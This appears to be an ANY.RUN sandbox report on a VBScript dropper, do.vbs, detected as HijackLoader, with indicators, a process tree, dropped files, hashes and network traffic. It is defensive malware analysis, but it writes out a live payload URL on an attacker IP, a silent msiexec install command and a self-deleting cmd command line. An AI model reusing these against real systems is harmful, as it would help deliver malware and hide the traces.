| File name: | do.vbs |
| Full analysis: | https://app.any.run/tasks/506b604c-535d-4a02-9acb-b5ced15954e3 |
| Verdict: | Malicious activity |
| Threats: | HijackLoader is a modular malware acting as a vehicle for distributing different types of malicious software on compromised systems. It gained prominence during the summer of 2023 and has since been used in multiple attacks against organizations from various sectors, including hospitality businesses. |
| Analysis date: | December 14, 2025, 06:08:06 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with CRLF line terminators |
| MD5: | EB32DA728F3CD7081F0CBCC8C52B202A |
| SHA1: | 524C315897F44F9009E801A98577C49530730E0E |
| SHA256: | A1432C163D00964E629CBF199B69634BF44FE9D36CAE4D14BFFF91326018043F |
| SSDEEP: | 12:9vWdgBK1HerhB08YakH4mgGFQfoZifaZCCcsBZgGS9HHCD:9AQhV7kpQGntcscGWHA |
MALICIOUS
Opens an HTTP connection (SCRIPT)
- wscript.exe (PID: 7412)
Creates internet connection object (SCRIPT)
- wscript.exe (PID: 7412)
Sends HTTP request (SCRIPT)
- wscript.exe (PID: 7412)
Starts CMD.EXE for self-deleting
- wscript.exe (PID: 7412)
GENERIC has been found (auto)
- msiexec.exe (PID: 7688)
- Blue-Port11.exe (PID: 7772)
- Blue-Port11.exe (PID: 7832)
Executing a file with an untrusted certificate
- XPFix.exe (PID: 7952)
HIJACKLOADER has been detected (YARA)
- Blue-Port11.exe (PID: 7832)
SUSPICIOUS
Creates a Stream, which may work with files, input/output devices, pipes, or TCP/IP sockets (SCRIPT)
- wscript.exe (PID: 7412)
Writes binary data to a Stream object (SCRIPT)
- wscript.exe (PID: 7412)
Saves data to a binary file (SCRIPT)
- wscript.exe (PID: 7412)
Runs shell command (SCRIPT)
- wscript.exe (PID: 7412)
Hides command output
- cmd.exe (PID: 7600)
Starts CMD.EXE for commands execution
- wscript.exe (PID: 7412)
Runs PING.EXE to delay simulation
- cmd.exe (PID: 7600)
Connects to unusual port
- wscript.exe (PID: 7412)
Reads the Windows owner or organization settings
- msiexec.exe (PID: 7688)
The process creates files with name similar to system file names
- msiexec.exe (PID: 7688)
- Blue-Port11.exe (PID: 7772)
Process drops SQLite DLL files
- msiexec.exe (PID: 7688)
- Blue-Port11.exe (PID: 7772)
Executable content was dropped or overwritten
- Blue-Port11.exe (PID: 7772)
- Blue-Port11.exe (PID: 7832)
Starts itself from another location
- Blue-Port11.exe (PID: 7772)
There is functionality for taking screenshot (YARA)
- Blue-Port11.exe (PID: 7832)
There is functionality for communication over UDP network (YARA)
- Blue-Port11.exe (PID: 7832)
INFO
Checks supported languages
- msiexec.exe (PID: 7688)
- Blue-Port11.exe (PID: 7772)
- Blue-Port11.exe (PID: 7832)
Reads the computer name
- msiexec.exe (PID: 7688)
- Blue-Port11.exe (PID: 7772)
- Blue-Port11.exe (PID: 7832)
The sample compiled with english language support
- msiexec.exe (PID: 7688)
- Blue-Port11.exe (PID: 7772)
Executable content was dropped or overwritten
- msiexec.exe (PID: 7688)
Creates files or folders in the user directory
- msiexec.exe (PID: 7688)
- Blue-Port11.exe (PID: 7832)
Creates a software uninstall entry
- msiexec.exe (PID: 7688)
Creates files in the program directory
- Blue-Port11.exe (PID: 7772)
The sample compiled with chinese language support
- Blue-Port11.exe (PID: 7832)
Create files in a temporary directory
- Blue-Port11.exe (PID: 7832)
Compiled with Borland Delphi (YARA)
- Blue-Port11.exe (PID: 7832)
Checks proxy server information
- slui.exe (PID: 7220)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
Total processes
153
Monitored processes
10
Malicious processes
4
Suspicious processes
1
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 7220 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7412 | "C:\WINDOWS\System32\WScript.exe" C:\Users\admin\AppData\Local\Temp\do.vbs | C:\Windows\System32\wscript.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
| 7480 | "C:\Windows\System32\msiexec.exe" /i "C:\Windows\Temp\upd1412_7054.msi" /quiet /qn /norestart | C:\Windows\System32\msiexec.exe | — | wscript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 0 Version: 5.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7600 | "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 30 >nul && del /f /q "C:\Windows\Temp\upd1412_7054.msi" | C:\Windows\System32\cmd.exe | — | wscript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7608 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7688 | C:\WINDOWS\system32\msiexec.exe /V | C:\Windows\System32\msiexec.exe | services.exe | ||||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows® installer Version: 5.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7696 | ping 127.0.0.1 -n 30 | C:\Windows\System32\PING.EXE | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7772 | "C:\Users\admin\AppData\Local\Baffled\Blue-Port11.exe" | C:\Users\admin\AppData\Local\Baffled\Blue-Port11.exe | msiexec.exe | ||||||||||||
User: admin Company: Smart Game Booster Integrity Level: MEDIUM Description: Smart Game Booster Exit code: 0 Version: 5.3.0.670 Modules
| |||||||||||||||
| 7832 | C:\ProgramData\com_web_gateway_v4_0\Blue-Port11.exe | C:\ProgramData\com_web_gateway_v4_0\Blue-Port11.exe | Blue-Port11.exe | ||||||||||||
User: admin Company: Smart Game Booster Integrity Level: MEDIUM Description: Smart Game Booster Version: 5.3.0.670 Modules
| |||||||||||||||
| 7952 | "C:\Users\admin\AppData\Roaming\com_web_gateway_v4_0\XPFix.exe" "C:\Users\admin\AppData\Roaming\com_web_gateway_v4_0\XPFix.exe" /u | C:\Users\admin\AppData\Roaming\com_web_gateway_v4_0\XPFix.exe | — | Blue-Port11.exe | |||||||||||
User: admin Company: 360.cn Integrity Level: MEDIUM Description: 360安全卫士 安全防护中心模块 Version: 1, 0, 0, 1013 | |||||||||||||||
Total events
5 880
Read events
5 776
Write events
95
Delete events
9
Modification events
| (PID) Process: | (7688) msiexec.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-1693682860-607145093-2874071422-1001\Components\FB3C7F527D40E02509C4F9F82E80101E |
| Operation: | write | Name: | 7CCBF1EF4ECAB234CBFEE55EC7A4BA90 |
Value: C:\Users\admin\AppData\Local\Baffled\PluginHelper.dll | |||
| (PID) Process: | (7688) msiexec.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-1693682860-607145093-2874071422-1001\Components\A0713645E276EFB5399AE76A75989D2F |
| Operation: | write | Name: | 7CCBF1EF4ECAB234CBFEE55EC7A4BA90 |
Value: C:\Users\admin\AppData\Local\Baffled\PowerMgr.dll | |||
| (PID) Process: | (7688) msiexec.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-1693682860-607145093-2874071422-1001\Components\C0515B39BAA056F59881DBE6CDA5BFF4 |
| Operation: | write | Name: | 7CCBF1EF4ECAB234CBFEE55EC7A4BA90 |
Value: C:\Users\admin\AppData\Local\Baffled\Register.dll | |||
| (PID) Process: | (7688) msiexec.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-1693682860-607145093-2874071422-1001\Components\340A7C8F396E3C251BF0F5927DC4488C |
| Operation: | write | Name: | 7CCBF1EF4ECAB234CBFEE55EC7A4BA90 |
Value: C:\Users\admin\AppData\Local\Baffled\rtl120.bpl | |||
| (PID) Process: | (7688) msiexec.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-1693682860-607145093-2874071422-1001\Components\F003FA7A663EF1A5DBB07E72BEBEC2CC |
| Operation: | write | Name: | 7CCBF1EF4ECAB234CBFEE55EC7A4BA90 |
Value: C:\Users\admin\AppData\Local\Baffled\Scan.dll | |||
| (PID) Process: | (7688) msiexec.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-1693682860-607145093-2874071422-1001\Components\01F19E88083A7B352B0738BD581E52F1 |
| Operation: | write | Name: | 7CCBF1EF4ECAB234CBFEE55EC7A4BA90 |
Value: C:\Users\admin\AppData\Local\Baffled\sdassist.dll | |||
| (PID) Process: | (7688) msiexec.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-1693682860-607145093-2874071422-1001\Components\2DB7F9E6CE065A656B1B1AC1B1CDA742 |
| Operation: | write | Name: | 7CCBF1EF4ECAB234CBFEE55EC7A4BA90 |
Value: C:\Users\admin\AppData\Local\Baffled\sqlite3.dll | |||
| (PID) Process: | (7688) msiexec.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-1693682860-607145093-2874071422-1001\Components\7F3484679A0A725549307C5F2E09144D |
| Operation: | write | Name: | 7CCBF1EF4ECAB234CBFEE55EC7A4BA90 |
Value: C:\Users\admin\AppData\Local\Baffled\Temperature.dll | |||
| (PID) Process: | (7688) msiexec.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-1693682860-607145093-2874071422-1001\Components\EF404C1C7EC27935AB2E2C864D720A7C |
| Operation: | write | Name: | 7CCBF1EF4ECAB234CBFEE55EC7A4BA90 |
Value: C:\Users\admin\AppData\Local\Baffled\vcl120.bpl | |||
| (PID) Process: | (7688) msiexec.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-1693682860-607145093-2874071422-1001\Components\A41242D72F1806855A78B58B2C265F46 |
| Operation: | write | Name: | 7CCBF1EF4ECAB234CBFEE55EC7A4BA90 |
Value: C:\Users\admin\AppData\Local\Baffled\vclx120.bpl | |||
Executable files
37
Suspicious files
23
Text files
0
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 7412 | wscript.exe | C:\Windows\Temp\upd1412_7054.msi | — | |
MD5:— | SHA256:— | |||
| 7688 | msiexec.exe | C:\Windows\Installer\f7006.msi | — | |
MD5:— | SHA256:— | |||
| 7688 | msiexec.exe | C:\Windows\Temp\~DFF9EF61ACB5355633.TMP | binary | |
MD5:311766E458C977DCD588768B0643BC2B | SHA256:5F72186C52E0A088786AC76696AF2405AE142E9077B0B64E79C820A1A748ED36 | |||
| 7688 | msiexec.exe | C:\Windows\Temp\~DF3034946D363B4F51.TMP | binary | |
MD5:BF619EAC0CDF3F68D496EA9344137E8B | SHA256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560 | |||
| 7688 | msiexec.exe | C:\Users\admin\AppData\Local\Baffled\PowerMgr.dll | executable | |
MD5:D0D3E744178EEA35DDB3E55568EEEDCA | SHA256:461A9122A5C3A63644D005CAA601CF9E4B7E5EF6F852E8767E398F39486E4E34 | |||
| 7688 | msiexec.exe | C:\Users\admin\AppData\Local\Baffled\HardwareLib.dll | executable | |
MD5:022568111D51B5DBB92C0AB0872B380C | SHA256:4E5F1F42F90316819B9FE431722C5CC8C0A91D90E0FEA87E580F17629E088A9A | |||
| 7688 | msiexec.exe | C:\Users\admin\AppData\Local\Baffled\PluginHelper.dll | executable | |
MD5:DDC1CC25830C2AFAAA64D6BD784FB26D | SHA256:3B123F1FEA7F38DE527BCA6DC51B9A922A7189A72441B48A39743063FB131148 | |||
| 7688 | msiexec.exe | C:\Users\admin\AppData\Local\Baffled\Cro.mfv | binary | |
MD5:6FAA31F811D8CCBC1FE2FDB442873DBF | SHA256:08131E9B6E0C7097F909DB372C44941E975DD6E0AEA237BE47A187AEEA8C8693 | |||
| 7688 | msiexec.exe | C:\Windows\Installer\f7009.msi | — | |
MD5:— | SHA256:— | |||
| 7688 | msiexec.exe | C:\Windows\Installer\MSI7100.tmp | binary | |
MD5:F21FC4F2AB3F306345C82A03640C2509 | SHA256:3B87F5A66C973B633D4B10F8D4E9D4BA037A970743F585B3FEEFE099D2D084A7 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
27
TCP/UDP connections
27
DNS requests
19
Threats
1
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
6768 | MoUsoCoreWorker.exe | GET | 304 | 51.104.136.2:443 | https://settings-win.data.microsoft.com/settings/v3.0/OneSettings/Client?OSVersionFull=10.0.19045.4046.amd64fre.vb_release.191206-1406&LocalDeviceID=s%3ABAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&FlightRing=Retail&AttrDataVer=186&OSUILocale=en-US&OSSkuId=48&App=WOSC&AppVer=&IsFlightingEnabled=0&TelemetryLevel=1&DeviceFamily=Windows.Desktop | unknown | — | — | whitelisted |
6768 | MoUsoCoreWorker.exe | GET | 304 | 51.104.136.2:443 | https://settings-win.data.microsoft.com/settings/v3.0/wsd/muse?ProcessorClockSpeed=3094&FlightIds=&UpdateOfferedDays=4294967295&BranchReadinessLevel=CB&OEMManufacturerName=DELL&IsCloudDomainJoined=0&ProcessorIdentifier=AMD64%20Family%2023%20Model%201%20Stepping%202&sku=48&ActivationChannel=Retail&AttrDataVer=186&IsMDMEnrolled=0&ProcessorCores=6&ProcessorModel=AMD%20Ryzen%205%203500%206-Core%20Processor&TotalPhysicalRAM=6144&PrimaryDiskType=4294967295&FlightingBranchName=&ChassisTypeId=1&OEMModelNumber=DELL&SystemVolumeTotalCapacity=260281&sampleId=95271487&deviceClass=Windows.Desktop&App=muse&DisableDualScan=0&AppVer=10.0&OEMSubModel=J5CR&locale=en-US&IsAlwaysOnAlwaysConnectedCapable=0&ms=0&DefaultUserRegion=244&UpdateServiceUrl=http%3A%2F%2Fneverupdatewindows10.com&osVer=10.0.19045.4046.amd64fre.vb_release.191206-1406&os=windows&deviceId=s%3ABAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&DeferQualityUpdatePeriodInDays=0&ring=Retail&DeferFeatureUpdatePeriodInDays=30 | unknown | — | — | whitelisted |
7412 | wscript.exe | GET | — | 95.164.53.115:5506 | http://95.164.53.115:5506/DVQQXUHT.msi | unknown | — | — | unknown |
1112 | svchost.exe | GET | 200 | 184.30.131.245:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
6296 | SIHClient.exe | GET | 200 | 23.59.18.102:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
6296 | SIHClient.exe | GET | 200 | 52.165.164.15:443 | https://fe3cr.delivery.mp.microsoft.com/clientwebservice/ping | unknown | — | — | whitelisted |
6296 | SIHClient.exe | GET | 200 | 20.165.94.63:443 | https://slscr.update.microsoft.com/sls/ping | unknown | — | — | whitelisted |
6296 | SIHClient.exe | GET | 304 | 20.165.94.63:443 | https://slscr.update.microsoft.com/SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | unknown | — | — | whitelisted |
6296 | SIHClient.exe | GET | 200 | 23.59.18.102:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
6296 | SIHClient.exe | GET | 200 | 20.165.94.63:443 | https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | unknown | — | 29.1 Kb | whitelisted |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | Not routed | — | whitelisted |
4624 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
6768 | MoUsoCoreWorker.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
3088 | RUXIMICS.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
4 | System | 192.168.100.255:138 | — | Not routed | — | whitelisted |
7412 | wscript.exe | 95.164.53.115:5506 | — | QWINS-LTD QWINS AS-SET: ~ # AS213702:AS-CUSTOMERS | GB | unknown |
1112 | svchost.exe | 40.126.31.0:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
1112 | svchost.exe | 184.30.131.245:80 | ocsp.digicert.com | AKAMAI-AS | US | whitelisted |
4624 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
4624 | svchost.exe | 2.16.164.72:80 | crl.microsoft.com | AKAMAI-ASN1 | NL | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
login.live.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
activation-v2.sls.microsoft.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
— | — | Unknown Traffic | ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW) |